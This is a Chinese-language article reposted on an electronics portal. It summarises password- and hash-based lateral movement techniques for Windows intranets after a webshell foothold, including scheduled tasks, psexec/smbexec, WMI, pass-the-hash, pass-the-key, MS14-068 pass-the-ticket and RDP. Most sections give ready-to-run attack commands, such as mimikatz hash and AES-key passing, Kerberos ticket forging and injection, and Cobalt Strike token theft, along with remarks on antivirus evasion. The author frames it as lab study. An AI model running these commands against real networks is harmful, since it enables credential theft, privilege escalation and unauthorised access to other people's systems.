0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

基于口令的横向移动进行内网渗透测试

jf_Fo0qk3ln 来源:csdn 作者:大川儿 2022-11-09 09:30 次阅读

前言

当我们拿下 webshell 后,若其服务器有内网环境,在进一步测试中就需要进行内网渗透测试,对于内网渗透测试的方法常用的为:基于口令的横向移动和基于漏洞的攻击。本文主要从基于口令的横向移动,自己收集了网上比较主流的方法,但是自己才疏学浅,有说法错误之处希望大佬们能够在评论区中指出,感激不敬。

一、通过 at&schtasks 进行明文传递

说明:at&schtasks 都是 windows 上创建计划任务的命令,只是针对的版本不同,at 是 win2008 及一下;

1、前提条件:


1)能够获得明文密码

2)链接的目标主机需要administrator权限,普通权限不能够进行文件操作(工作组或域)

3)跳板主机任意权限

4)可在本地和远程执行

2、执行流程:

1)与目标主机建立IPC链接

2)拷贝要执行命令的脚本到目标主机

3)查看当前时间,创建计划任务(at&schtasks)

4)删除IPC链接

3、命令语句:(这里的命令语句在下面很多方法中都会有体现,所以下面若有用到该类似方法我将会简写)

pYYBAGNrAx-AM9WiAAEs3hupRVU795.jpg

二、、atexec 进行明文与HASH传递

1、前提条件:


1)能够获得明文密码或密码hash值

2)目标主机需要连接administrator用户(工作组或域)

3)跳板主机任意权限

4)可在本地和远程执行

2、命令语句:

poYBAGNrAz6AN0usAAB2_KhtnZY589.jpg

三、SMB 服务利用

1、psexec 工具传递

说明:SMB 服务可以通过明文或 hash 传递进行攻击,需要对方服务器 445 端口开放。psexec 工具有微软官方自带(不用考虑免杀),也有第三方制作(需要考虑免杀)。

前提条件:


1)能够获得明文密码或密码hash值(官方工具只能使用明文,第三方可以使用hash)

2)通过psexec工具的话只能在本地反弹shell,但是CS可以辅助我们使用psexec方法,远程反弹会话

3)建立的连接需要连接administrator用户,普通权限无法连接成功

4)跳板机任意权限

命令语句:

1)微软官方工具,只能通过明文建立

poYBAGNrA2-AakgyAACkxKUqhMk768.jpg

2)第三方工具,可以通过 hash 值建立

pYYBAGNrA4WAGRzyAAB2QqGYMwM740.jpg

3) 通过 CS 进行传递,该方法我会在后期说 CS 的时候体现出来,比较简单,这里就不细说了

2、smbexec 工具传递

说明:该工具为第三方工具,在实际情况中需要考虑免杀请况,同时服务器需要开通 445 端口 前提条件:


1)能够获得明文密码或密码hash值(官方工具只能使用明文,第三方可以使用hash)

2)只能本地反弹shell,无法远程反弹

3)建立的连接需要连接administrator用户,普通权限无法连接成功

4)跳板机任意权限

命令语句:

pYYBAGNrA8KALutbAABlBMjih-A260.jpg

四、WMI 服务利用

1、wmic 传递

说明:WMI 服务需要目标服务器开通 135 端口,同时需要目标服务器明文密码,该方法不会在目标服务器中留下日志,但是没有回显

前提条件:


1)获得明文密码

2)可在本地和远程执行

3)需要administrator用户账号,普通权限连接不成功

4)跳板机任意权限

命令语句:

1)wmic/node:192.168.89.3/user:administrator/password:123.comprocesscallcreate"cmd.exe/cnetuser>C:1.txt"#工作组

2)wmic/node:192.168.89.3/user:hackeradministrator/password:1qaz@2wsxprocesscallcreate"cmd.exe/cipconfig>C:1.txt"#域内

2、cscript 传递

说明:自带的 cscript 为明文传递,有回显,但是需要事先传入 wmiexec.vbs 文件,需要目标服务器开启 135 端口

前提条件:


1)获得明文密码

2)只能在本地执行

3)需要administrator用户账号,普通权限连接不成功

4)跳板机任意权限 命令语句:

1)cscript//nologowmiexec.vbs/shell192.168.89.3administrator123.com#工作组

2)cscript//nologowmiexec.vbs/shell192.168.89.3hackeradministrator123.com#域内

3、wmiexec 传递

说明:wmiexec 为第三方工具,需要注意免杀问题,也需要目标服务器开启 135 端口

前提条件:


1)获取明文密码或hash值

2)只能在本地执行

3)需要administrator用户账号,普通权限连接不成功

4)跳板机任意权限 命令语句:

1)wmiexec.exe./administrator:123.com@192.168.89.3"whoami"#工作组明文

2)wmiexec.exehacker/administrator:123.com@192.168.89.3"whoami"#域内明文

3)wmiexec.exe-hashes:afffeba176210fad4628f0524bfe1942./administrator@192.168.89.3"whoami"#hash值

五、PTH 横向传递攻击

说明:PTH 攻击建立在密码 hash 之上。攻击系统范围为 win7win2008r2win2012 等。若系统打了 KB2871997 补丁只能 administrator 连接,没有打补丁任何用户都可以连接

前提条件:


1)获取密码hash

2)判断是否打了补丁--KB2871997

3)跳板机权限为管理员权限

4)可以在本地和远程执行

5)值得注意的是,普通用户建立的连接,似乎权限过小,很多操作无法进行,所以我判断普通用户似乎是无效的

命令语句:

1)本地执行(基于 mimikatz 执行)


#基于mimikatz执行

1)sekurlsa::pth/user:sql2008/domain:hacker/ntlm:2ba0f5fcb5c72afc4a6d612a005fe39d#域内hash传递

2)sekurlsa::pth/user:administrator/domain:workgroup/ntlm:2ba0f5fcb5c72afc4a6d612a005fe39d#工作组hash

#弹出一个命令执行框,在这个框中建立了类似的ipc$连接,

#我们可以查看目录,下载文件,上传文件,创建计划任务执行文件

#如:

dir\sql2008.hacker.comc$

dir\192.168.89.3c$

2)远程执行(基于 CS 执行)


#基于CS执行

1)mimikatzsekurlsa::pth/user:administrator/domain:workgroup/ntlm:afffeba176210fad4628f0524bfe1942

2)steal_tokenPID

3)shelldir\192.168.89.3c$

六、PTK 横向传递攻击

说明:PTK 传递攻击针对的是打了 KB2871997 补丁的,未打补丁是不能用的,这里需要使用 mimikatz 获取 AES keys,获取命令为:sekurlsa::ekeys

前提条件:


1)判断是否打了KB2871997补丁

2)获取AES密码

3)跳板机的管理员权限

4)能在本地运行,远程没有测试成功 命令语句为:

1)mimikatz.exe"sekurlsa::ekeys"#获取aes

2)sekurlsa::pth/user:sql2008/domain:hacker/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

七、PTT攻击

1、说明:PTT 攻击是利用 Kerberos 协议进行攻击的,常用的攻击手法有:MS14-068,Golden ticket,SILVER ticket。它是将连接合法的票据注入到内存中实现连接。 MS14-068 造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是 kb3011780

2、前提条件:

1)利用ms14-068、kekeo、本地票据在本地测试成功,

2)利用ms14-068、kekeo跳板机本地连接时可以是任意权限

3)利用ms14-068需要知道域内某用户的账号及明文密码

4)kekeo需要知道域内用户名与hash值

5)本地票据需要管理员权限(mimikatz导出票据需要高权限)

1)利用ms14-068远程连接需要管理员权限

3、命令语句:

1)利用 ms14-068


#1)本地连接

1)WMICuseraccountgetname,sid#sid获取,管理员权限获取的更多一点

2)ms14-068.exe-u域成员名@域名-ssid(域成员)-d域控制器地址-p域成员密码(生成TGT)

3)MS14-068.exe-uweb07@hacker.com-sS-1-5-21-2374949671-2603306159-227762320-1105-d192.168.89.2-p123@com

4)mimikatz.exe"kerberos::ptcTGT_mary@god.org.ccache"#(TGT票据注入)

5)dir\DC.hacker.comc$(注意要用域内域名连接,这里其实是类似建立了一条IPC$连接)

#2)远程连接,在CS中执行

1)WMICuseraccountgetname,sid//sid获取

2)mimikatzkerberos::list//列出当前票据

3)mimikatzkerberos::purge//清除票据

4)MS14-068.exe-uweb07@hacker.com-sS-1-5-21-2374949671-2603306159-227762320-1105-d192.168.89.2-p123@com//生成tgt票据

5)mimikatzkerberos::ptcTGT_web07@hacker.com.ccache//导入票据

6)shelldir\sql2008.hacker.com//利用

2)利用工具 kekeo(未成功)


1)ekeo"tgt::ask/user:mary/domain:god.org/ntlm:518b98ad4178a53695dc997aa02d455c"#生成票据

2)kerberos::pttTGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi#导入票据

4)dir\DC.hacker.comc$#利用

八、RDP 传递攻击 (测试失败)

1、说明:RDP 传递其实就是利用了远程桌面功能

2、前提条件:


1)获得对方账户明文或hash(用户需要是能够有远程桌面连接权限)

2)本地执行

3)跳板机任意权限

3、命令语句:

sekurlsa::pth/user:administrator/domain:hacker.com/ntlm:2ba0f5fcb5c72afc4a6d612a005fe39d"/run:mstsc.exe/restrictedadmin"

总结

上述方法自己在本地搭建了靶场进行测试,可能有很多外在因数是自己没有考虑到的,所以可能会存在错误,欢迎各位大佬批评指正。





审核编辑:刘清

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • WINDOWS
    +关注

    关注

    3

    文章

    3541

    浏览量

    88639
  • Hash
    +关注

    关注

    0

    文章

    32

    浏览量

    13195
  • SMB
    SMB
    +关注

    关注

    0

    文章

    38

    浏览量

    11761

原文标题:内网横向移动常用方法总结(附工具)

文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    如何清除主板BIOS的口令?

    如何清除主板BIOS的口令?   为了保护计算机的资源和安全,可以为其加上开机密码。但是一旦不小心将密码忘记,就会致使计算机不能进入BIOS设置,或者不能启动计算机。  1.可先
    发表于 01-05 15:38

    请问花生壳怎么进行内网穿透的?

    花生壳是怎么进行内网穿透的,能不能用来***,还是只有组建内网的功能。
    发表于 04-18 06:02

    内网穿透详解-基于NATAPP&NatAssist测试

    ://natapp.cn)的客户端进行内网穿透的,使用非常方便,进而单独调通4G模块与内网服务器的通信。【内网穿透】本质为NAT(Net Address Translation)网络地址转换,即通过
    发表于 09-13 12:14

    web渗透测试流程

    不需要)  漏洞利用:当我们拿到了该网站存在漏洞之后,就可以进一步拿到网站的webshell。  内网转发:如果我们还想进一步的探测内网主机的信息的话,我们就需要进行内网转发了。  内网
    发表于 01-29 17:27

    WEB安全渗透测试流程到底是什么

    对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。换句话来说,渗透测试是指渗透人员在不同的位置(比如从
    的头像 发表于 02-20 13:59 3098次阅读

    四个方法探测服务器的内网存活主机

    渗透中,当我们拿下一台服务器作为跳板机进一步进行内网渗透时,往往需要通过主机存活探测和端口扫描来收集内网资产。
    的头像 发表于 09-27 15:18 1.3w次阅读
    四个方法探测服务器的<b class='flag-5'>内网</b>存活主机

    内网渗透:获取Windows内Hash密码的方法

    内网渗透中,当攻击者获取到内网某台机器的控制权后,会议被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。
    的头像 发表于 12-24 16:01 919次阅读

    内网环境下的渗透测试

    我们总是先通过对外提供服务的,防守最薄弱的主机打进去,然后搭建隧道,通过该主机访问内部的其他主机。快速横向移动到到内网中的核心资产,获取核心敏感数据和权限,完成一次疼痛的打击。
    的头像 发表于 09-14 09:36 1726次阅读

    白盒渗透测试的优势是什么

    渗透测试是一项重要的进攻性安全演习或操作。如果执行得当,它会极大地提高您组织的安全性。渗透测试分为三种类型,根据渗透
    的头像 发表于 09-19 10:04 1221次阅读

    APK渗透测试工具:AppMessenger

    APK渗透测试工具:AppMessenger,一款适用于以APP病毒分析、APP漏洞挖掘、APP开发、HW行动/红队/渗透测试团队为场景的移动
    的头像 发表于 11-18 09:32 2836次阅读

    一款支持弱口令爆破的内网资产探测漏洞扫描工具SweetBabyScan

    轻量级内网资产探测漏洞扫描工具:SweetBabyScan,是一款支持弱口令爆破的内网资产探测漏洞扫描工具,集成了Xray与Nuclei的Poc
    的头像 发表于 12-02 09:23 4866次阅读

    一款支持弱口令爆破的内网资产探测漏洞扫描工具

    甜心宝贝是一款支持弱口令爆破的内网资产探测漏洞扫描工具,集成了Xray与Nuclei的Poc。
    的头像 发表于 12-14 09:48 3968次阅读

    记一次内网中反弹shell的艰难历程

    最近在客户现场对内网服务器进行渗透测试,发现了大量的弱口令,本次历程就是从这里开始。
    的头像 发表于 03-07 09:30 1171次阅读

    如何使用DudeSuite进行渗透测试工作

    技术的理解使用DudeSuite进行渗透测试工作,半自动Web渗透测试就目前的来说依然是主流,相比起全自动化的扫描器及批量化脚本可以在
    的头像 发表于 06-13 09:04 1619次阅读
    如何使用DudeSuite<b class='flag-5'>进行</b><b class='flag-5'>渗透</b><b class='flag-5'>测试</b>工作

    内网穿透工具的种类、原理和使用方法

    本文以渗透的视角,总结几种个人常用的内网穿透,内网代理工具,介绍其简单原理和使用方法。
    的头像 发表于 08-25 10:35 1828次阅读
    <b class='flag-5'>内网</b>穿透工具的种类、原理和使用方法